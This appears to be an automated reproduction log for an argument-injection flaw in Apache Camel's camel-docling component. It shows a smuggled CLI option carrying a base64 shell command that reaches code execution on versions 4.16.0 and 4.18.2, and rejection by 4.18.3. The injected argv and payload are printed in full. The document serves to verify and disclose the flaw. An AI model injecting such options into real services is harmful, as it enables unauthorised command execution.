[setup] ROOT=/data/pruva/runs/4444e238-1345-44a8-a279-5f23cf194a14/bundle [setup] java=openjdk version "17.0.19" 2026-04-21 [setup] maven=Apache Maven 3.9.12 [setup] harness dir=/data/pruva/project-cache/808f31c5-2393-4ae1-b99f-19b2f77f2927/repo [setup] real docling=/data/pruva/project-cache/808f31c5-2393-4ae1-b99f-19b2f77f2927/docling-venv/bin/docling [setup] installed proof plugin in /data/pruva/project-cache/808f31c5-2393-4ae1-b99f-19b2f77f2927/docling-venv/lib/python3.14/site-packages [build] compiling Camel harness [build] compile ok [run] starting two vulnerable attempts on 4.16.0 [service] camel-docling 4.16.0 listening on port 20267 (pid 34601) [attempt] 4.16.0 vulnerable attempt=1 HTTP=500 docling_invoked=true rce_marker=true camel_rejected=false marker_file=logs/vulnerable_4.16.0_attempt1_rce_marker.txt [service] camel-docling 4.16.0 listening on port 20268 (pid 34855) [attempt] 4.16.0 vulnerable attempt=2 HTTP=500 docling_invoked=true rce_marker=true camel_rejected=false marker_file=logs/vulnerable_4.16.0_attempt2_rce_marker.txt [run] starting two affected-denylist attempts on 4.18.2 [service] camel-docling 4.18.2 listening on port 20269 (pid 35110) [attempt] 4.18.2 vulnerable attempt=1 HTTP=500 docling_invoked=true rce_marker=true camel_rejected=false marker_file=logs/vulnerable_4.18.2_attempt1_rce_marker.txt [service] camel-docling 4.18.2 listening on port 20270 (pid 35365) [attempt] 4.18.2 vulnerable attempt=2 HTTP=500 docling_invoked=true rce_marker=true camel_rejected=false marker_file=logs/vulnerable_4.18.2_attempt2_rce_marker.txt [run] starting two fixed negative-control attempts on 4.18.3 [service] camel-docling 4.18.3 listening on port 20271 (pid 35630) [attempt] 4.18.3 fixed attempt=1 HTTP=500 docling_invoked=false rce_marker=false camel_rejected=true marker_file=logs/fixed_4.18.3_attempt1_rce_marker.txt [service] camel-docling 4.18.3 listening on port 20272 (pid 35782) [attempt] 4.18.3 fixed attempt=2 HTTP=500 docling_invoked=false rce_marker=false camel_rejected=true marker_file=logs/fixed_4.18.3_attempt2_rce_marker.txt =================== REPRODUCTION SUMMARY =================== Claimed impact: code_execution Observed impact: attacker-controlled command executed by a real docling plugin import path after Camel passes an injected argv option to the real docling subprocess. Affected 4.16.0 attempts: invoked/marker = true/true and true/true Affected 4.18.2 attempts: invoked/marker = true/true and true/true Fixed 4.18.3 attempts: invoked/marker/rejected = false/false/true and false/false/true CONFIRMED=true --- vulnerable 4.16.0 attempt1 marker --- PRUVA_RCE_CONFIRMED version=4.16.0 attempt=1 uid=1000 --- vulnerable 4.16.0 attempt1 argv --- === invocation 34739 2026-07-07T11:46:36Z === ARGV: [0]=--pruva-rce-command-b64 [1]=cHJpbnRmICdQUlVWQV9SQ0VfQ09ORklSTUVEIHZlcnNpb249NC4xNi4wIGF0dGVtcHQ9MSB1aWQ9JyA+ICcvZGF0YS9wcnV2YS9ydW5zLzQ0NDRlMjM4LTEzNDUtNDRhOC1hMjc5LTVmMjNjZjE5NGExNC9idW5kbGUvbG9ncy92dWxuZXJhYmxlXzQuMTYuMF9hdHRlbXB0MV9yY2VfbWFya2VyLnR4dCc7IGlkIC11ID4+ICcvZGF0YS9wcnV2YS9ydW5zLzQ0NDRlMjM4LTEzNDUtNDRhOC1hMjc5LTVmMjNjZjE5NGExNC9idW5kbGUvbG9ncy92dWxuZXJhYmxlXzQuMTYuMF9hdHRlbXB0MV9yY2VfbWFya2VyLnR4dCc= [2]=--to [3]=md [4]=--no-ocr [5]=--output [6]=/tmp/docling-output17316906357689679676 [7]=/data/pruva/project-cache/808f31c5-2393-4ae1-b99f-19b2f77f2927/repo/input.txt --- vulnerable 4.18.2 attempt1 marker --- PRUVA_RCE_CONFIRMED version=4.18.2 attempt=1 uid=1000 --- vulnerable 4.18.2 attempt1 argv --- === invocation 35250 2026-07-07T11:46:51Z === ARGV: [0]=--pruva-rce-command-b64 [1]=cHJpbnRmICdQUlVWQV9SQ0VfQ09ORklSTUVEIHZlcnNpb249NC4xOC4yIGF0dGVtcHQ9MSB1aWQ9JyA+ICcvZGF0YS9wcnV2YS9ydW5zLzQ0NDRlMjM4LTEzNDUtNDRhOC1hMjc5LTVmMjNjZjE5NGExNC9idW5kbGUvbG9ncy92dWxuZXJhYmxlXzQuMTguMl9hdHRlbXB0MV9yY2VfbWFya2VyLnR4dCc7IGlkIC11ID4+ICcvZGF0YS9wcnV2YS9ydW5zLzQ0NDRlMjM4LTEzNDUtNDRhOC1hMjc5LTVmMjNjZjE5NGExNC9idW5kbGUvbG9ncy92dWxuZXJhYmxlXzQuMTguMl9hdHRlbXB0MV9yY2VfbWFya2VyLnR4dCc= [2]=--to [3]=md [4]=--no-ocr [5]=--output [6]=/tmp/docling-output15225006050102621888 [7]=/data/pruva/project-cache/808f31c5-2393-4ae1-b99f-19b2f77f2927/repo/input.txt --- fixed 4.18.3 attempt1 response --- Custom argument '--pruva-rce-command-b64' is not a recognized docling CLI flag. Only known docling flags are permitted as custom arguments.--- fixed 4.18.3 attempt1 argv log (should be empty/missing) --- ============================================================ [proof-carry] copied attempt artifacts to /data/pruva/project-cache/808f31c5-2393-4ae1-b99f-19b2f77f2927/.pruva/proof-carry/latest_attempt [result] REPRODUCED: code-execution boundary reached on affected Camel versions and blocked by Camel 4.18.3.